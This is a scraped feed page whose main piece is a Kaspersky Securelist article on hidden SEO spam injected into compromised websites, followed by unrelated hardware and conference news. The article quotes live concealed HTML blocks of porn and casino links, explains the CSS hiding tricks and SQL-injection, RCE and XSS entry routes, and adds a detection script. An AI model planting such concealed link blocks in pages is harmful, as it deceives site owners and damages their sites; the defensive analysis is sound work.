<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xxx download hd <a href="https://fuxee.mobi" title="fuxee.mobi">fuxee.mobi</a> fat woman sex</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">bangalore xxx <a href="https://bigassporntrends.com" rel="dofollow" target="_self" title="bigassporntrends.com">bigassporntrends.com</a> sexy video kashmir</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xnxx sister sex <a href="https://wetwap.info" rel="dofollow" target="_self" title="wetwap.info hd porn streaming">wetwap.info</a> blue film a video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">tamilschoolsexvideo <a href="https://tubetria.mobi" rel="dofollow" title="tubetria.mobi">tubetria.mobi</a> sex free videos</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس من اجل المال مترجم <a href="https://www.yesexyporn.com/" title="yesexyporn.com فوائد لحس الكس">yesexyporn.com</a> نسوان شرميط</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">kamapishi <a href="https://desisexy.org/" target="_blank" title="desisexy.org free porn gay hd online">desisexy.org</a> savita bhabhi xvideo</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">aflamk2 <a href="https://www.pornvideoswatch.net/" target="_self" title="pornvideoswatch.net">pornvideoswatch.net</a> نيك ثمينات</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">hentaifox futanari <a href="https://www.hentaitale.net/" target="_blank" title="hentaitale.net pisuhame">hentaitale.net</a> hen hentai</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">video sexy wallpaper <a href="https://povporntrends.com" target="_blank">povporntrends.com</a> bengolibf</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">persona 5 hentai manga <a href="https://www.younghentai.net/" rel="dofollow" target="_self" title="younghentai.net oni hentai">younghentai.net</a> toys hentai</div>

This example demonstrates a slightly more sophisticated approach to hiding the block containing Black Hat SEO content. It suggests an attempt to bypass the automated search engine filters that easily detect the display:none; parameter.
Let us analyze the set of CSS styles: <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">. The properties position: absolute;height:0pt;width:0pt; remove the block from the visible area of the page, while overflow: auto prevents the content from being displayed even if it exceeds zero dimensions. This makes the links inaccessible to humans, but it does not prevent them from being preserved in the DOM (document object model). That’s why HTML code scanning systems, such as search engines, are able to see it.

In addition to the zero dimensions of the block, in this example, just as in the previous one, we see the attribute rel="dofollow", as well as many links to pornographic websites with relevant keywords.

The combination of styles that sets the block dimensions to zero is less obvious than display:none; because the element is technically present in the rendering, although it is not visible to the user. Nevertheless, it is worth noting that modern search engine security algorithms, such as Google Penguin, detect this technique too. To counter this, malicious actors may employ more complex techniques for evading detection. Here is another example:
<script src="files/layout/js/slider3d.js?v=0d6651e2"></script><script src="files/layout/js/layout.js?v=51a52ad1"></script>
<style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}.ads-gold::-webkit-scrollbar { display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}.ads-gold {height: 0px;overflow: hidden;}</style>
<div class="ads-gold">
Ganhe Rápido nos Jogos Populares do Cassino Online <a href="https://580-bet.com" target="_blank">580bet</a>
Cassino <a href="https://bet-7k.com" target="_blank">bet 7k</a>: Diversão e Grandes Vitórias Esperam por Você
Aposte e Vença no Cassino <a href="https://leao-88.com" target="_blank">leao</a> – Jogos Fáceis e Populares
Jogos Populares e Grandes Prêmios no Cassino Online <a href="https://luck-2.com" target="_blank">luck 2</a>
Descubra os Jogos Mais Populares no Cassino <a href="https://john-bet.com" target="_blank">john bet</a> e Ganhe
<a href="https://7755-bet.com" target="_blank">7755 bet</a>: Apostas Fáceis, Grandes Oportunidades de Vitória
Jogue no Cassino Online <a href="https://cbet-88.com" target="_blank">cbet</a> e Aumente suas Chances de Ganhar
Ganhe Prêmios Incríveis com Jogos Populares no Cassino <a href="https://bet7-88.com" target="_blank">bet7</a>
Cassino <a href="https://pk55-88.com" target="_blank">pk55</a>: Onde a Sorte Está ao Seu Lado
Experimente o Cassino <a href="https://8800-bet.com" target="_blank">8800 bet</a> e Ganhe com Jogos Populares
Ganhe Facilmente no Cassino Online <a href="https://doce-88.com" target="_blank">doce</a>
Aposte e Vença no Cassino <a href="https://bet-4-br.com" target="_blank">bet 4</a>
Jogos Populares e Grandes Premiações na <a href="https://f12--bet.com" target="_blank">f12bet</a>
Descubra a Diversão e Vitória no Cassino <a href="https://bet-7-br.com" target="_blank">bet7</a>
Aposte nos Jogos Mais Populares do Cassino <a href="https://ggbet-88.com" target="_blank">ggbet</a>
Ganhe Prêmios Rápidos no Cassino Online <a href="https://bet77-88.com" target="_blank">bet77</a>
Jogos Fáceis e Rápidos no Cassino <a href="https://mrbet-88.com" target="_blank">mrbet</a>
Jogue e Ganhe com Facilidade no Cassino <a href="https://bet61-88.com" target="_blank">bet61</a>
Cassino <a href="https://tvbet-88.com" target="_blank">tvbet</a>: Onde a Sorte Está Ao Seu Lado
Aposte nos Melhores Jogos do Cassino Online <a href="https://pgwin-88.com" target="_blank">pgwin</a>
Ganhe Grande no Cassino <a href="https://today-88.com" target="_blank">today</a> com Jogos Populares
Cassino <a href="https://fuwin-88.com" target="_blank">fuwin</a>: Grandes Vitórias Esperam por Você
Experimente os Melhores Jogos no Cassino <a href="https://brwin-88.com" target="_blank">brwin</a>
</div></body>

Aside from the parameters we are already familiar with, which are responsible for concealing a block (height:0px, color:transparent, overflow:hidden), and the class name that hints at its contents (<style type="text/css">.ads-gold), this example begins with two script tags: <script src="files/layout/js/slider3d.js?v=0d6651e2"></script> and <script src="files/layout/js/layout.js?v=51a52ad1"></script>. These indicate that external JavaScript can dynamically control the page content, for example, by adding or changing hidden links, that is, modifying this block in real time.

This is a more advanced approach than the ones in the previous examples. Yet it is also detected by filters responsible for identifying suspicious manipulations.

Other parameters and attributes exist that attackers use to conceal a link block. These, however, can also be detected:

  • the parameter visibility:hidden; can sometimes be seen instead of display:none;.
  • With position:absolute;, the block containing hidden links may not have a zero size at all, but instead be located far beyond the visible area of the page. This can be achieved, for example, via the property left:-9232px;, as in the example below.


<div style="position: absolute; left: -9232px">
<a href="https://romabet.cam/">روما بت</a><br>
<a href="https://mahbet.cam/">ماه بت</a><br>
<a href="https://pinbahis.com.co/">پین باهیس</a><br>
<a href="https://bettingmagazine.org/">بهترین سایت شرط بندی</a><br>
<a href="https://1betcart.com/">بت کارت</a><br>
<a href="https:// yasbet.com.co/">یاس بت</a><br>
<a href="https://yekbet.cam/">یک بت</a><br>
<a href="https://megapari.cam/">مگاپاری </a><br>
<a href="https://onjabet.net/">اونجا بت</a><br>
<a href="https://alvinbet.org/">alvinbet.org</a><br>
<a href="https://2betboro.com/">بت برو</a><br>
<a href="https://betfa.cam/">بت فا</a><br>
<a href="https://betforward.help/">بت فوروارد</a><br>
<a href="https://1xbete.org/">وان ایکس بت</a><br>
<a href="https://1win-giris.com.co/">1win giriş</a><br>
<a href="https://betwiner.org/">بت وینر</a><br>
<a href="https://4shart.com/">بهترین سایت شرط بندی ایرانی</a><br>
<a href="https://1xbetgiris.cam">1xbet giriş</a><br>
<a href="https://1kickbet1.com/">وان کیک بت</a><br>
<a href="https://winbet-bet.com/">وین بت</a><br>
<a href="https://ritzobet.org/">ریتزو بت</a><br>

How attackers place hidden links on other people’s websites


To place hidden links, attackers typically exploit website configuration errors and vulnerabilities. This may be a weak or compromised password for an administrator account, plugins or an engine that have not been updated in a long time, poor filtering of user inputs, or security issues on the hosting provider’s side. Furthermore, attackers may attempt to exploit the human factor, for example, by setting up targeted or mass phishing attacks in the hope of obtaining the website administrator’s credentials.

Let us examine in detail the various mechanisms through which an attacker gains access to editing a page’s HTML code.

  • Compromise of the administrator password. An attacker may guess the password, use phishing to trick the victim into giving it away, or steal it with the help of malware. Furthermore, the password may be found in a database of leaked credentials. Site administrators frequently use simple passwords for control panel protection or, even worse, leave the default password, thereby simplifying the task for the attacker.
    After gaining access to the admin panel, the attacker can directly edit the page’s HTML code or install their own plugins with hidden SEO blocks.
  • Exploitation of CMS (WordPress, Joomla, Drupal) vulnerabilities. If the engine or plugins are out of date, attackers use known vulnerabilities (SQL Injection, RCE, or XSS) to gain access to the site’s code. After that, depending on the level of access gained by exploiting the vulnerability, they can modify template files (header.php, footer.php, index.php, etc.), insert invisible blocks into arbitrary site pages, and so on.
    In SQL injection attacks, the hacker injects their malicious SQL code into a database query. Many websites, from news portals to online stores, store their content (text, product descriptions, and news) in a database. If an SQL query, such as SELECT * FROM posts WHERE id='$id', allows arbitrary data to be passed in, the attacker can use the $id field to inject their code. This allows the attacker to change the content of records, for example, by inserting HTML with hidden blocks.
    In RCE (remote code execution) attacks, the attacker gains the ability to run their own commands on the server where the website runs. Unlike SQL injections, which are limited to the database, RCE provides almost complete control over the system. For example, it allows the attacker to create or modify site files, upload malicious scripts, and, of course, inject invisible blocks.
    In an XSS (cross-site scripting) attack, the attacker injects their JavaScript code directly into the web page by using vulnerable input fields, such as those for comments or search queries. When another user visits this page, the malicious script automatically executes in their browser. Such a script enables the attacker to perform various malicious actions, including stealthily adding a hidden <div> block with invisible links to the page. For XSS, the attacker does not need direct access to the server or database, as in the case with SQL injection or RCE; they only need to find a single vulnerability on the website.
  • An attack via the hosting provider. In addition to directly hacking the target website, an attacker may attempt to gain access to the website through the hosting environment. If the hosting provider’s server is poorly secured, there is a risk of it being compromised. Furthermore, if multiple websites or web applications run on the same server, a vulnerability in one of them can jeopardize all other projects. The attacker’s capabilities depend on the level of access to the server. These capabilities may include: injecting hidden blocks into page templates, substituting files, modifying databases, connecting external scripts to multiple websites simultaneously, and so forth. Meanwhile, the website administrator may not notice the problem because the vulnerability is being exploited within the server environment rather than the website code.

Note that the appearance of hidden links on a website is not always a sign of a cyberattack. The issue often arises during the development phase, for example, if a pirated copy of a template is downloaded to save money, or if the project is carried out by an unscrupulous web developer.

Why attackers place hidden blocks on websites


One of the most obvious goals for injecting hidden blocks into other people’s websites is to steal the PageRank from the victim. The more popular and authoritative the website is, the more interesting it is to attackers. However, this does not mean that moderate- or low-traffic websites are safe. As a rule, administrators of popular websites and large platforms do their best to adhere to security rules, so it is not so easy to get close to them. Therefore, attackers may target less popular – and less protected – websites.

As previously mentioned, this approach to promoting websites is easily detected and blocked by search engines. In the short term, though, attackers still benefit from this: they manage to drive traffic to the websites that interest them until search engine algorithms detect the violation.

Even though the user does not see the hidden block and cannot click the links, attackers can use scripts to boost traffic to their websites. One possible scenario involves JavaScript creating an iframe in the background or sending an HTTP request to the website from the hidden block, which then receives information about the visit.

Hidden links can lead not just to pornographic or other questionable websites but also to websites with low-quality content whose sole purpose is to be promoted and subsequently sold, or to phishing and malicious websites. In more sophisticated schemes, the script that provides “visits” to such websites may load malicious code into the victim’s browser.

Finally, hidden links allow attackers to lower the reputation of the targeted website and harm its standing with search engines. This threat is especially relevant in light of the fact that algorithms such as Google Penguin penalize websites hosting questionable links. Attackers may use these techniques as a tool for unfair competition, hacktivism, or any other activity that involves discrediting certain organizations or individuals.

Interestingly, in 2025, we have more frequently encountered hidden blocks with links to pornographic websites and online casinos on various legitimate websites. With low confidence, we can suggest that this is partly due to the development of neural networks, which make it easy to automate such attacks, and partly due to the regular updates to Google’s anti-spam systems, the latest of which was completed at the end of September 2025: attackers may have rushed to maximize their gains before the search engine made it a little harder for them.

Consequences for the victim website


The consequences for the victim website can vary in severity. At a minimum, the presence of hidden links placed by unauthorized parties hurts search engine reputation, which may lead to lower search rankings or even complete exclusion from search results. However, even without any penalties, the links disrupt the internal linking structure because they lead to external websites and pass on a portion of the victim’s weight to them. This negatively impacts the rankings of key pages.

Although unseen by visitors, hidden links can be discovered by external auditors, content analysis systems, or researchers who report such findings in public reports. This is something that can undermine trust in the website. For example, sites where our categorization engine detects links to pornography pages will be classified as “Adult content”. Consequently, all of our clients who use web filters to block this category will be unable to visit the website. Furthermore, information about a website’s category is published on our Kaspersky Threat Intelligence Portal and available to anyone wishing to look up its reputation.

If the website is being used to distribute illegal or fraudulent content, the issue enters the legal realm, with the owner potentially facing lawsuits from copyright holders or regulators. For example, if the links lead to websites that distribute pirated content, the site may be considered an intermediary in copyright infringement. If the hidden block contains malicious scripts or automatic redirects to questionable websites, such as phishing pages, the owner can be charged with fraud or some other cybercrime.

How to detect a hidden link block on your website


The simplest and most accessible method for any user to check a website for a hidden block is to view its source code in the browser. This is very easy to do. Navigate to the website, press Control+U, and the website’s code will open in a new tab. Search (Control+F) the code for the following keywords: display:none, visibility:hidden, opacity:0, height:0, width:0, position:absolute. In addition, you can check for keywords that are characteristic of the hidden content itself. When it comes to links that point to adult or gambling sites, you should look for porn, sex, casino, card, and the like.

A slightly more complex method is using web developer tools to investigate the DOM for invisible blocks. After the page fully loads, open DevTools (F12) in the browser and go to the Elements tab. Search (Control+F) for keywords such as <a, iframe, display:none, hidden, opacity. Hover your cursor over suspicious elements in the code so that the browser highlights their location on the page. If the block occupies zero area or is located outside the visible area, that is an indicator of a hidden element. Check the Computed tab for the selected element; there, you can see the applied CSS styles and confirm that it is hidden from the user’s view.
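As an added example (not a tool from the post), the following Python script applies the checklist above to raw HTML offline: it walks the document with the standard library parser, marks elements concealed by the inline styles from examples 1 and 2, the off-screen left:-9232px variant, or a class defined in a preceding <style> block as in example 3, and reports every external link inside them together with whether its rel attribute lets it pass weight. The entry point is scan_hidden_links(html, site_host); the sample page, its placeholder hostnames and the four-digit off-screen threshold are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# One rule per concealment technique; a match on an element's CSS marks that
# element, and everything nested inside it, as hidden from the viewer.
HIDING_RULES = [
    ("display:none", re.compile(r"display\s*:\s*none", re.I)),
    ("visibility:hidden", re.compile(r"visibility\s*:\s*hidden", re.I)),
    ("opacity:0", re.compile(r"opacity\s*:\s*0(?:\.0+)?\s*(?:;|}|$)", re.I)),
    ("color:transparent", re.compile(r"color\s*:\s*transparent", re.I)),
    ("zero-size", re.compile(r"(?:height|width)\s*:\s*0(?:px|pt|em|%)?\s*(?:;|}|$)", re.I)),
    # Assumed threshold: four or more digits (left:-9232px), not a small layout nudge.
    ("off-screen", re.compile(r"(?:left|top)\s*:\s*-\d{4,}px", re.I)),
]
CLASS_RULE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")  # ".ads-gold {height: 0px;...}"
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr"}  # never get an end tag


def hiding_reasons(css):
    """Names of every concealment rule matching a CSS declaration string."""
    return [name for name, rx in HIDING_RULES if rx.search(css or "")]


def host_of(url):
    host = urlparse(url).netloc.lower()  # '' for relative links
    return host[4:] if host.startswith("www.") else host


class HiddenLinkScanner(HTMLParser):
    """Streams through the document while tracking which open elements are hidden."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = host_of("https://" + site_host)
        self.class_css = {}   # class name -> declarations gathered from <style> blocks
        self.stack = []       # (tag, reasons) for each currently open element
        self.style_buf = []   # text of the <style> block being read
        self.in_style = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "style":
            self.in_style = True
        reasons = hiding_reasons(a.get("style"))
        # Class rules only apply if their <style> block came first, as in example 3.
        for cls in (a.get("class") or "").split():
            reasons += [f".{cls} {r}" for r in hiding_reasons(self.class_css.get(cls))]
        if tag == "a" and a.get("href"):
            self._check_link(a, reasons)
        if tag not in VOID_TAGS:
            self.stack.append((tag, reasons))

    def handle_data(self, data):
        if self.in_style:
            self.style_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
            for cls, decl in CLASS_RULE.findall("".join(self.style_buf)):
                self.class_css[cls] = self.class_css.get(cls, "") + decl + ";"
            self.style_buf = []
        for i in range(len(self.stack) - 1, -1, -1):  # tolerate unclosed tags
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def _check_link(self, a, own_reasons):
        target = host_of(a["href"])
        if not target or target == self.site_host:
            return  # internal link: not what an SEO spam block injects
        reasons = [r for _, rs in self.stack for r in rs] + own_reasons
        if reasons:
            rel = (a.get("rel") or "").lower()
            self.findings.append({
                "href": a["href"],
                "passes_weight": "nofollow" not in rel,  # dofollow or no rel: weight flows
                "hidden_by": reasons,
            })


def scan_hidden_links(html, site_host):
    """Return every external link that sits inside a concealed element."""
    scanner = HiddenLinkScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page (placeholder hosts): one visible partner link, one
# internal link inside a hidden block, and four concealed external links.
SAMPLE_PAGE = """<html><head>
<style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}
.ads-gold {height: 0px;overflow: hidden;}</style></head><body>
<p>Visit our <a href="https://partner.example.org/">partner</a> (visible, legitimate).</p>
<div style="display: none;">keyword <a href="https://spam-a.example.net/" rel="dofollow">a</a>
keyword <a href="https://www.example.com/about">about us</a></div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">
<a href="https://spam-b.example.net" target="_blank">b</a></div>
<div class="ads-gold">keyword <a href="https://spam-c.example.net" rel="nofollow">c</a></div>
<div style="position: absolute; left: -9232px"><a href="https://spam-d.example.net/">d</a><br>
</body></html>"""
```

Running scan_hidden_links(SAMPLE_PAGE, "www.example.com") reports the four spam hosts with the technique that hides each one, while the visible partner link and the internal link are ignored.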

You can also utilize specialized SEO tools. These are typically third-party solutions that scan website SEO data and generate reports. They can provide a report about suspicious links as well. Few of them are free, but when selecting a tool, you should be guided primarily by the vendor’s reputation rather than price. It is better to use tried-and-true, well-known services that are known to be free of malicious or questionable payloads. Examples of these trusted services include Google Search Console, Bing Webmaster Tools, OpenLinkProfiler, and SEO Minion.

Another way to discover hidden SEO spam on a website is to check the CMS itself and its files. First, you should scan the database tables for suspicious HTML tags with third-party links that may have been inserted by attackers, and also carefully examine the website’s template files (header.php, footer.php, and index.php) and included modules for unfamiliar or suspicious code. Pay particular attention to encrypted insertions, unclear scripts, or links that should not originally be present in the website’s structure.

Additionally, you can look up your website’s reputation on the Kaspersky Threat Intelligence Portal. If you find it in an uncharacteristic category – typically “Adult content”, “Sexually explicit”, or “Gambling” – there is a high probability that there is a hidden SEO spam block embedded in your website.

How to protect your website


To prevent hidden links from appearing on your website, avoid unlicensed templates, themes, and other pre-packaged solutions. The entire site infrastructure must be built only on licensed and official solutions. The same principle applies to webmasters and companies you hire to build your website: we recommend checking their work for hidden links, but also for vulnerabilities in general. Never cut corners when it comes to security.

Keep your CMS, themes, and plugins up to date, as new versions often patch known vulnerabilities that attackers can exploit. Delete any unused plugins and themes. The fewer unnecessary components are installed, the lower the risk of an exploit in one of the extensions, plugins, or themes. It is worth noting that this risk never disappears completely – it is still there even with a minimal set of components, as long as they are outdated or poorly secured.

To protect files and the server, it is important to properly configure access permissions. On servers running Linux and other Unix-like systems, use 644 for files and 755 for folders. This means that the owner can open folders, and read and modify folders and files, while the group and other users can only read files and open folders. If write access is not necessary, for example in template folders, forbid it altogether to lower the risk of malicious actors making unauthorized changes. Furthermore, you must set up regular, automatic website backups so that data can be quickly restored if there is an issue.

Additionally, it is worth using web application firewalls (WAFs), which help block malicious requests and protect the site from external attacks. This solution is available in Kaspersky DDoS Protection.

To protect the administrator panel, use only strong passwords and 2FA (Two-Factor Authentication) at all times. You would be well-advised to restrict access to the admin panel by IP address if you can. Only a limited group of individuals should be granted admin privileges.


securelist.com/seo-spam-hidden…


Chicken Squisher 3000: Squish-Proof Security


Chicken Squisher 3000

Keeping chickens in predator-prone areas demands serious fortifications, but even the most robust coop can become a hassle without automation. That’s where [lcamtuf] steps in with his Chicken Squisher 3000, a clever DIY automatic door mechanism that opens and closes based on ambient light levels.

The chicken coop he previously built did not include a mechanism to automatically close the inner door at night, meaning that arrangements would have to be made should [lcamtuf] want to leave town for a couple of days. Not wanting to go with a commercial option for this door as that would require a good deal of modifications to the original door setup, the Chicken Squisher 3000 adds minimal parts to the existing door to now open and close the door at dawn and dusk.

Using a 12 V DC motor with a gear reduction, he was able to generate more than enough torque to open and close the thick wooden door. Instead of a complex geared rack and pinion setup, [lcamtuf] has the motor mounted to a smooth rod that then applies force across the swing of the door, attached with a rod end bearing. Driving the door’s automation is an AVR16DD14 microcontroller, which is used to read the NSL-A6009 light sensor. [lcamtuf] uses a DRV8231 motor driver for controlling power going to that 12 V motor, with the added benefit of being able to adjust the stall torque to dial in a value strong enough to overcome the wooden door’s friction, but weak enough not to endanger any of his birds. There are also buttons on the metal enclosure for overriding the light sensor should he want to operate the door manually.

Thanks, [lcamtuf], for sending in your latest weekend project; we love the resourcefulness of using just a handful of cheap parts to make a robust solution for your coop. If you haven’t seen them yet, be sure to check out some of our other chicken coop door hacks featured before.


hackaday.com/2025/10/16/chicke…


A Deep Dive into Molten Bismuth


Bismuth is known for a few things: its low melting point, high density, and psychedelic hopper crystals. A literal deep-dive into any molten metal would be a terrible idea, regardless of low melting point, but [Electron Impressions]’s video on “Why Do Bismuth Crystals Look Like That” may be the most educational eight minutes posted to YouTube in the past week.

The whole video is worth a watch, but since spoilers are the point of these articles, we’ll let you in on the secret: it all comes down to Free Energy. No, not the perpetual motion scam sort of free energy, but the potential that is minimized in any chemical reaction. There’s potential energy to be had in crystal formation, after all, and nature is always (to the extent possible) going to minimize the amount left on the table.

In bismuth crystals (at least when you have a pot slowly cooling at standard temperature and pressure), that means instead of a large version of the rhombohedral crystal you might naively expect if you’ve tried growing salt or sugar crystals in beakers, you get the madman’s maze that actually emerges. The reason for this is that atoms are preferentially deposited onto the vertices and edges of the growing crystal rather than the faces. That tends to lead to more vertices and edges, until you get the fractal spirals that a good bismuth crystal is known for. (It’s not unlike the mechanism by which the dreaded tin whiskers grow, as a matter of fact.)

Bismuth isn’t actually special in this respect; indeed, everything in this video applies to other metals, in the right conditions. It just so happens that “the right conditions” in terms of crystal growth and the cooling of the melt are trivial to achieve when melting bismuth in a way that they aren’t when melting, say, aluminum in the back yard. [Electron Impressions] doesn’t mention it because he is laser-focused on bismuth here, but hopper crystals of everything from table salt to gold have been produced in the lab. When cooling goes too quickly, it’s “any port in a storm” and atoms slam into the solid phase without a care for the crystal structure, and you get fine-grained, polycrystalline solids; when it goes slowly enough, the underlying crystal geometry can dominate. Hopper crystals exist in a weird and delightful middle ground that’s totally worth eight minutes to learn about.

Aside from being easy to grow into delightful crystals, bismuth can also be useful when desoldering, and, oddly enough, making the world’s fastest transistor.

youtube.com/embed/wKo69nS2xVg?…


hackaday.com/2025/10/16/a-deep…


Positive Results with Negative Resistance


Try an experiment. Next time you are in a room with someone, ask them to name everything in the room. Only certain kinds of people will say “air” or “light.” For most people, those are just givens, and you don’t think about them unless, for some reason, you don’t have them. Resistance is like that in electronics. You use it constantly, but do you ever think much about what it is? For a resistor, the value in ohms really represents the slope of the line that describes the amount of voltage you’ll see across the component when it carries a certain amount of current. For resistors, that slope is — at least in theory — constant and positive. But [Void Electronics] made a video exploring negative resistance, and it is worth watching, below.

If you haven’t seen negative resistance before, you might wonder how that is possible. Ohm’s law is just a shorthand for calculating the slope of a graph with voltage on the Y axis and current on the X axis. It works because the voltage and current are always zero at the same time, so the slope is (V-0)/(I-0), and we just shorten that to the normal Ohm’s law equation.

But not everything has a linear response to current. Some devices will have different slopes over different current regions. And sometimes that slope can be negative, meaning that an increase in current through the device will cause it to drop less voltage. Of course, this is usually just over a narrow range and, as [Void] points out, most devices don’t specify that parameter on their data sheets. In fact, some transistors won’t even work in the circuit.

The circuit in question in the video below the break is an odd one. It uses two resistors, an LED, and a transistor. But the transistor’s base is left disconnected. No 555 needed. How does it work? Watch the video and you’ll see. There’s even a curve tracer if you don’t like to see hand-drawn graphs.

We’ve looked at negative resistance more than once. There are a few exotic devices, like tunnel diodes, that are explicitly used for the negative resistance property. When the gas in a neon bulb breaks down, you get the same effect.

youtube.com/embed/jqUyaGwFd10?…


hackaday.com/2025/10/16/positi…


After Trucking Them Home, Old Solar Panels Keep On Trucking


The fact that there exist in our world flat rocks that make lightning when you point them at the sun is one of the most unappreciated bits of wizardry in this modern age. As hackers, we love all of this techno-wizardry, but some of us abhor paying full price for it. Like cars, one way to get a great discount is to buy used. [Backyard Solar Project] helped a friend analyze some 14-year-old panels to see just how they’d held up over the years, and it was actually better than we might have expected.

The big polycrystalline panels were rated at 235 W when new, and they got six of them for the low, low price of “get this junk off my property”. Big panels are a bit of a pain to move, but that’s still a great deal. Especially considering that after cleaning they averaged 180 W, a capacity factor of 77%. Before cleaning, 14 years’ worth of accumulated grime cost about eight watts on average, an argument for cleaning your panels. Under the same lighting conditions, the modern panel (rated at 200 W) was giving 82% of rated output.

That implies that after 14 years, the panels are still at about 94% of their original factory output, assuming the factory wasn’t being overoptimistic about the numbers to begin with. Still, assuming you can trust the marketing, half a percent power drop per year isn’t too bad. It’s also believable, since the US National Renewable Energy Laboratory (yes, they have one) has done tests that put the average at 0.75 %/yr, so these panels did better than average. Of course the average American solar panel lives in a hotter climate than [Backyard Solar Project], which helps explain the slower degradation.

Now, we’re not your Dad or your accountant, so we’re not going to tell you if used solar panels are worth the effort. On the one hand, they still work, but on the other hand, the density is quite a bit lower. Just look at that sleek, modern 200 W panel next to the old 235 W unit. If you’re area-limited, you might want to spring for new, or at least the more energy-dense monocrystalline panels that have become standard the last 5 years or so, which aren’t likely to be given away just yet. On the gripping hand, free is free, and most of us are much more constrained by budget than by area. If nothing else, you might have a fence to stick old panels against; the vertical orientation is surprisingly effective at higher latitudes.

youtube.com/embed/3AKq6nlvP3E?…


hackaday.com/2025/10/16/after-…


2025 Component Abuse Challenge: An LED as a Light Dependent Capacitor


The function of an LED is to emit light when the device is forward biased within its operating range, and it’s known by most people that an LED can also operate as a photodiode. Perhaps some readers are also aware that a reverse biased LED also has a significant capacitance, to the extent that they can be used in some RF circuits in the place of a varicap diode. But how do those two unintentional properties of an LED collide? As it turns out, an LED can also behave as a light dependent capacitor. [Bornach] has done just that, and created a light dependent sawtooth oscillator.

The idea is simple enough: there is a capacitance between the two sides of the depletion zone in a reverse biased diode, and since an LED is designed so that its junction is exposed to external light, any photons which hit it will change the charge on the junction. Since the size of the depletion zone, and therefore the capacitance, depends on the voltage and hence on the charge, incoming light can change the capacitance.

The circuit is a straightforward enough sawtooth oscillator using an op-amp with a diode in its feedback loop, but where we might expect to find a capacitor to ground on the input, we find our reverse biased LED. The video below the break shows it in operation, and it certainly works. There’s an interesting point here in that an LED in this mode is suggested as an alternative to a cadmium sulphide LDR, and it’s certainly quicker responding. We feel duty bound to remind readers that using the LED as a photodiode instead is likely to be a bit simpler.

This project is part of the Hackaday Component Abuse Challenge, in which competitors take humble parts and push them into applications they were never intended for. You still have time to submit your own work, so give it a go!

youtube.com/embed/lFQo_J6E04k?…

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/10/16/2025-c…


A Bus Becomes a Travelling Retro Computer Museum in the United Kingdom


In the United Kingdom, Jason and Luke Stoner, father and son, have turned an old school bus into a travelling museum dedicated to retro computers and game consoles. The inspiration came when Luke visited the famous Computer Museum in Cambridge and decided to make vintage technology accessible to a wider audience.

Thus Retro Reset was born, a non-profit organisation that began the complete restoration of the vehicle in autumn 2024. The project was completed in just one year, with the Cambridge museum among the main sponsors of the initiative.

The bus currently travels around East Sussex, stopping at schools, colleges and youth centres, with the aim of introducing children and teenagers to the history of computing.

Inside, the spaces house not only consoles from various eras but also a wide range of computer components: old servers, memory modules, graphics cards, hard disks, floppy disks and other devices that let visitors observe how PCs have evolved over time.

The exhibition, compact because of the vehicle’s size, presents around ten systems running at the same time, updated periodically.

Among the most prized items is a computer once used for editing Hollywood films. Visitors have the opportunity to interact directly with the consoles, take PCs apart and study the individual components, taking part in hands-on engineering activities.

Retro Reset does not merely display historical objects: it is an interactive platform that lets you experience the history of the digital world first-hand. The initiative could inspire similar new projects, spreading the passion for retro computers and keeping technological memory alive for future generations.

We leave you with the initiative’s own words:

“Our mission is to bring the fascinating history of computers and video games back to life for young people. Our mobile workshops, housed in a beautifully restored bus, offer a hands-on journey into the world of retro technology, exploring the evolution of gaming and computing from the 1970s to today. What makes us unique? Not only do we offer the opportunity to play classic consoles and explore vintage gadgets, we also give young people the chance to handle, take apart and experiment up close with period technology. From retro computers to iconic game consoles, kids will be able to fully understand how these machines work and how they helped shape the digital world we know today.”

The article A Bus Becomes a Travelling Retro Computer Museum in the United Kingdom comes from Red Hot Cyber.


Three Years in, JawnCon Continues to Grow and Impress


Make no mistake, just getting a hacker con off the ground is a considerable challenge. But the really hard part comes after. To be more than a one-off success story, you’ve got to expand the event year after year in a manageable way. Go too slow, and attendees might lose interest. Move too fast, and you run the risk of going broke if your ticket sales don’t keep up with your ambitions.

Luckily for hackers living in the Philadelphia area, the folks behind JawnCon have once again demonstrated they’re able to thread the needle. While the ticket price remained the same as in 2024, this year an additional track of talks was introduced as well as expanded activities throughout the con. Even though it only wrapped this past weekend, there’s already buzz about what the event will look like in 2026.

Until then, let’s take a look at some of the projects that were on display at this year’s JawnCon. If it’s the talks you’re after, they’ll be edited and uploaded to the event’s YouTube page in the near future. In the meantime, the Friday and Saturday live streams are still available.

Meshtastic Spreads its Web


While it wasn’t officially part of JawnCon’s considerable network infrastructure playground, Meshtastic ended up being a big part of the two-day event. Members of Philly Mesh had a table where they were showing off a wide array of commercial and DIY nodes, the crew behind the Hacker Pager were offering up a special edition of the faux-retro portable communicator, and it seemed like every other attendee had brought their own mesh-capable gadget with them.

The end result was easily the most active Meshtastic environment I’ve ever personally found myself in. Wandering the con venue you could expect to see more than 100 individual nodes in the area, with the majority of them happily chattering away. Even during the off-hours on Friday and Saturday night, there was still plenty of mesh activity between the two main hotels where many of the attendees were staying.

